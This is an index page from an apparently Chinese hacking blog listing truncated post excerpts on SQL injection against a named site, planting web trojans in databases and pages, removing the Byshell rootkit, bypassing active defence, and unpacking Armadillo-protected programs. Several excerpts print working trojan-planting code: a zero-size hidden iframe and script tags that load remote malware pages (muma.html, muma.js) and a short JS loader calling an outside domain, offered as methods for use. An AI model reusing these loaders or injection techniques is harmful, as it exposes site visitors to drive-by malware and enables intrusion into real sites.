预览模式: 普通 | 列表

SQL注射修改难猜解的MD5

在线破解MD5的网站上查。但有的MD5密码很偏,所以一些新手会放弃。我为新手介绍一种很简单就能修改难猜解MD5密码的方法。

常入侵的高手就忽略过..

随便找个地址:http://www.dtedu.org/news.asp?id=121

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

最近比较流行的数据库挂马

作者:茄子宝

以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

SQL语句如下:

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

挂网马的4个方法

一、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马
<script src=http://www.xxx.com/muma.js></script>

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

超短挂马代码大全

原创超短JS挂马
挂马的代码:
<script src=http://a1l.cn></script>
index.htm内容:
document.write("<div style='display:none'>")

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

五个步骤帮你清除内核级木马程序Byshell

Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技术特征的独立功能远程控制后门程序(Backdoor)。其利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。它是内核级的木马程序,主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。
黑客通常用Byshell木马程序远程控制安装了Windows NT/2000/XP/2003操作系统的机器。当Byshell被安装在一台远程计算机上后,黑客就拥有完全控制该机器的能力,并且不会被已控制机器所安装的杀毒和防火墙等软件及管理员手工检测出来。

如何绕过主动防御

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

The requested pause, continue, or stop is not vali

The requested pause, continue, or stop is not valid for this service.

net stop 都无法操作,暂停也不行,实在是...
分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

Armadillo 3.X脱壳+修复

最近大家对Armadillo 3.X脱壳的研究文章很多了,再写就有灌水的嫌疑。只是前几天答应fly写一篇的,我不想失言。  


工具:OllyDBG1.1汉化版;LordPE ;Import.Reconstructor.v1.6.Fanal.CHS  
操作系统:WIN2K3  

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

爱的中体验之Armadillo3.X加壳的双进程基本壳

【脱文标题】 爱的中体验之Armadillo3.X加壳的双进程基本壳
    
【脱文作者】 weiyi75[Dfcg]

【作者邮箱】 weiyi75@sohu.com

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

Armadillo 3.6主程序脱壳

工具:OllyDBG1.1汉化版;LordPE  
操作系统:WIN2K  
目标程序:Armadillo.exe(3.6主程序)  
  最近大家对Armadillo 3.6脱的研究有所升温,有标准加壳的还有CopyMemII+Debug模式的加壳的等等。于是本人也凑个热闹:来个其主程序的脱文。较之他们的不同点是:一是主程序脱壳难度大点;二是不用其它辅助dump工具。(初步脱壳,没有修复)  
一、寻找OEP并Dump进程  

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0

关于双进程Armadillo标准壳的脱法

昨天看了csjwoman的那个双进程标准壳的NOTEPAD.EXE,说真的一开始还真不知如何下手,既不能用脱COPYMEMII(它没有用内存写入函数)的方法,也不能简单套用以前脱标准壳的方法(因为它还是有子进程的),后来仔细参考了下mysqladm的文章《试玩armadillo3.50a一点心得 》有了点启发(最近从他的这篇脱文中学到的东西可不少)。下面谈谈如何脱这种双进程的标准壳。
最近很懒,不愿写东西,所以也就不讲什么原理了(可以参考mysqladm的脱文),这里就简单说下方法。其实很简单就是不要让父进程生成子进程。所以我们可以这样做。
载入后隐藏OD,忽略所有异常,然后BP OpenMutexA,F9运行,断下后在一块空地输入如下代码,这里在401000输入,代码如下(抄来的)
00401000    60              PUSHAD  
00401001    9C              PUSHFD  

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0